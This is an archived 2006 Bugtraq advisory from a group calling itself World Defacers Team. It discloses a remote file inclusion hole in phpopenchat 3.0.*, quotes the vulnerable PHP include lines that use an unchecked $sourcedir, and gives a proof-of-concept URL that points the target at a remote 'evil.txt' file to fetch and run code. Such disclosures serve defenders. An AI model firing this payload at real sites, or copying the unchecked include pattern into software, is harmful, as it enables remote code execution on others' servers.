lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060906191711.25859.qmail@securityfocus.com> Date: 6 Sep 2006 19:17:11 -0000 From: stormhacker@...mail.com To: bugtraq@...urityfocus.com Subject: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit [W]orld [D]efacers Team --------------------Summary---------------- eVuln ID: WD23 Vendor: phpopenchat-3.0.* Vendor's Web Site: http://phpopenchat.org Class: Remote PoC/Exploit: Available Solution: Not Available Discovered by: rUnViRuS ( wdzone.net & worlddefacers.de ) -----------------Description--------------- include_once("QueryString.php"); include_once("Settings.php"); include_once("$sourcedir/Subs.php"); include_once("$sourcedir/Errors.php"); include_once("$sourcedir/Load.php"); //include_once("$sourcedir/Security.php"); --------------PoC/Exploit---------------------- http://www.host.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://host/evil.txt? --------------Solution--------------------- No Patch available. --------------Credit----------------------- Discovered by: rUnViRuS (worlddefacers.de)